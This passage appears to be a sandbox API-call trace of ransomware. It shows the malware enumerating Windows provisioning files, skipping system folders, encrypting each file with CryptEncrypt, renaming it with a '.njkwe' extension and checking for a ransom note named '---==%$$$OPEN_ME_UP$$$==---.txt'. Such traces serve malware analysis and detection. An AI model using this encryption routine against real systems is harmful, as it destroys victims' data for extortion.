lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.168] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.169] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.169] CloseHandle (hObject=0x43c) returned 1 [0077.169] GetProcessHeap () returned 0xbe0000 [0077.169] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.169] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\183__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0077.169] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\183__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\183__connections_cellular_pccw (hong kong sar)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\183__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\183__connections_cellular_pccw (hong kong sar)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.169] GetProcessHeap () returned 0xbe0000 [0077.169] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.169] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906e6a13, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x906e6a13, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x906e6a13, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2db, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="184__Connections_Cellular_SmarTone-Vodafone (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", cAlternateFileName="184__C~1.PRO")) returned 1 [0077.169] lstrcmpiW (lpString1="184__Connections_Cellular_SmarTone-Vodafone (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.169] lstrcmpiW (lpString1="184__Connections_Cellular_SmarTone-Vodafone (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.170] lstrcmpiW (lpString1="184__Connections_Cellular_SmarTone-Vodafone (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.170] lstrcmpiW (lpString1="184__Connections_Cellular_SmarTone-Vodafone (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.170] lstrcmpiW (lpString1="184__Connections_Cellular_SmarTone-Vodafone (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.170] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\184__Connections_Cellular_SmarTone-Vodafone (Hong Kong SAR)_i0$(__MVID)@WAP.provxml") returned 177 [0077.170] StrStrIW (lpFirst="184__Connections_Cellular_SmarTone-Vodafone (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.170] lstrcmpW (lpString1="184__Connections_Cellular_SmarTone-Vodafone (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.170] lstrcmpW (lpString1="184__Connections_Cellular_SmarTone-Vodafone (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.170] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\184__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.170] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\184__Connections_Cellular_SmarTone-Vodafone (Hong Kong SAR)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\184__connections_cellular_smartone-vodafone (hong kong sar)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.170] GetTickCount () returned 0x1153a08 [0077.170] GetTickCount () returned 0x1153a08 [0077.170] GetTickCount () returned 0x1153a08 [0077.170] GetTickCount () returned 0x1153a08 [0077.170] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.170] GetProcessHeap () returned 0xbe0000 [0077.170] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.170] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2db, lpOverlapped=0x0) returned 1 [0077.176] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd25, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.176] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2db, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2db, lpOverlapped=0x0) returned 1 [0077.176] GetProcessHeap () returned 0xbe0000 [0077.176] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.176] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.176] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.176] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.177] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.177] CloseHandle (hObject=0x43c) returned 1 [0077.177] GetProcessHeap () returned 0xbe0000 [0077.177] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.177] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\184__Connections_Cellular_SmarTone-Vodafone (Hong Kong SAR)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 197 [0077.177] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\184__Connections_Cellular_SmarTone-Vodafone (Hong Kong SAR)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\184__connections_cellular_smartone-vodafone (hong kong sar)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\184__Connections_Cellular_SmarTone-Vodafone (Hong Kong SAR)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\184__connections_cellular_smartone-vodafone (hong kong sar)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.177] GetProcessHeap () returned 0xbe0000 [0077.177] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.177] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9070cc83, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9070cc83, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9070cc83, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x286, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="185__Connections_Cellular_Telenor Hungary (Hungary)_i0$(__MVID)@WAP.provxml", cAlternateFileName="185__C~1.PRO")) returned 1 [0077.177] lstrcmpiW (lpString1="185__Connections_Cellular_Telenor Hungary (Hungary)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.177] lstrcmpiW (lpString1="185__Connections_Cellular_Telenor Hungary (Hungary)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.178] lstrcmpiW (lpString1="185__Connections_Cellular_Telenor Hungary (Hungary)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.178] lstrcmpiW (lpString1="185__Connections_Cellular_Telenor Hungary (Hungary)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.178] lstrcmpiW (lpString1="185__Connections_Cellular_Telenor Hungary (Hungary)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.178] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\185__Connections_Cellular_Telenor Hungary (Hungary)_i0$(__MVID)@WAP.provxml") returned 169 [0077.178] StrStrIW (lpFirst="185__Connections_Cellular_Telenor Hungary (Hungary)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.178] lstrcmpW (lpString1="185__Connections_Cellular_Telenor Hungary (Hungary)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.178] lstrcmpW (lpString1="185__Connections_Cellular_Telenor Hungary (Hungary)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.178] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\185__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.178] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\185__Connections_Cellular_Telenor Hungary (Hungary)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\185__connections_cellular_telenor hungary (hungary)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.178] GetTickCount () returned 0x1153a17 [0077.178] GetTickCount () returned 0x1153a17 [0077.178] GetTickCount () returned 0x1153a17 [0077.178] GetTickCount () returned 0x1153a17 [0077.178] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.178] GetProcessHeap () returned 0xbe0000 [0077.178] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.178] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x286, lpOverlapped=0x0) returned 1 [0077.181] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.181] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x286, lpOverlapped=0x0) returned 1 [0077.182] GetProcessHeap () returned 0xbe0000 [0077.182] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.182] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.182] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.182] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.182] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.182] CloseHandle (hObject=0x43c) returned 1 [0077.182] GetProcessHeap () returned 0xbe0000 [0077.182] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.182] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\185__Connections_Cellular_Telenor Hungary (Hungary)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 189 [0077.182] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\185__Connections_Cellular_Telenor Hungary (Hungary)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\185__connections_cellular_telenor hungary (hungary)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\185__Connections_Cellular_Telenor Hungary (Hungary)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\185__connections_cellular_telenor hungary (hungary)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.183] GetProcessHeap () returned 0xbe0000 [0077.183] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.183] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9070cc83, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9070cc83, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9070cc83, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="186__Connections_Cellular_Magyar Telekom (Hungary)_i0$(__MVID)@WAP.provxml", cAlternateFileName="186__C~1.PRO")) returned 1 [0077.183] lstrcmpiW (lpString1="186__Connections_Cellular_Magyar Telekom (Hungary)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.183] lstrcmpiW (lpString1="186__Connections_Cellular_Magyar Telekom (Hungary)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.183] lstrcmpiW (lpString1="186__Connections_Cellular_Magyar Telekom (Hungary)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.183] lstrcmpiW (lpString1="186__Connections_Cellular_Magyar Telekom (Hungary)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.183] lstrcmpiW (lpString1="186__Connections_Cellular_Magyar Telekom (Hungary)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.183] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\186__Connections_Cellular_Magyar Telekom (Hungary)_i0$(__MVID)@WAP.provxml") returned 168 [0077.183] StrStrIW (lpFirst="186__Connections_Cellular_Magyar Telekom (Hungary)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.183] lstrcmpW (lpString1="186__Connections_Cellular_Magyar Telekom (Hungary)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.183] lstrcmpW (lpString1="186__Connections_Cellular_Magyar Telekom (Hungary)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.183] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\186__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.183] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\186__Connections_Cellular_Magyar Telekom (Hungary)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\186__connections_cellular_magyar telekom (hungary)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.183] GetTickCount () returned 0x1153a17 [0077.183] GetTickCount () returned 0x1153a17 [0077.183] GetTickCount () returned 0x1153a17 [0077.183] GetTickCount () returned 0x1153a17 [0077.183] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.184] GetProcessHeap () returned 0xbe0000 [0077.184] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.184] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d7, lpOverlapped=0x0) returned 1 [0077.187] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.187] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d7, lpOverlapped=0x0) returned 1 [0077.188] GetProcessHeap () returned 0xbe0000 [0077.188] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.188] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.188] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.188] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.188] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.188] CloseHandle (hObject=0x43c) returned 1 [0077.188] GetProcessHeap () returned 0xbe0000 [0077.188] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.188] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\186__Connections_Cellular_Magyar Telekom (Hungary)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 188 [0077.188] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\186__Connections_Cellular_Magyar Telekom (Hungary)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\186__connections_cellular_magyar telekom (hungary)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\186__Connections_Cellular_Magyar Telekom (Hungary)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\186__connections_cellular_magyar telekom (hungary)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.189] GetProcessHeap () returned 0xbe0000 [0077.189] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.189] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9070cc83, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9070cc83, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9070cc83, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2db, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="187__Connections_Cellular_Vodafone HU (Hungary)_i0$(__MVID)@WAP.provxml", cAlternateFileName="187__C~1.PRO")) returned 1 [0077.189] lstrcmpiW (lpString1="187__Connections_Cellular_Vodafone HU (Hungary)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.189] lstrcmpiW (lpString1="187__Connections_Cellular_Vodafone HU (Hungary)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.189] lstrcmpiW (lpString1="187__Connections_Cellular_Vodafone HU (Hungary)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.189] lstrcmpiW (lpString1="187__Connections_Cellular_Vodafone HU (Hungary)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.189] lstrcmpiW (lpString1="187__Connections_Cellular_Vodafone HU (Hungary)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.189] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\187__Connections_Cellular_Vodafone HU (Hungary)_i0$(__MVID)@WAP.provxml") returned 165 [0077.189] StrStrIW (lpFirst="187__Connections_Cellular_Vodafone HU (Hungary)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.189] lstrcmpW (lpString1="187__Connections_Cellular_Vodafone HU (Hungary)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.189] lstrcmpW (lpString1="187__Connections_Cellular_Vodafone HU (Hungary)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.189] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\187__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.189] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\187__Connections_Cellular_Vodafone HU (Hungary)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\187__connections_cellular_vodafone hu (hungary)_i0$(__mvid)@wap.provxml"), 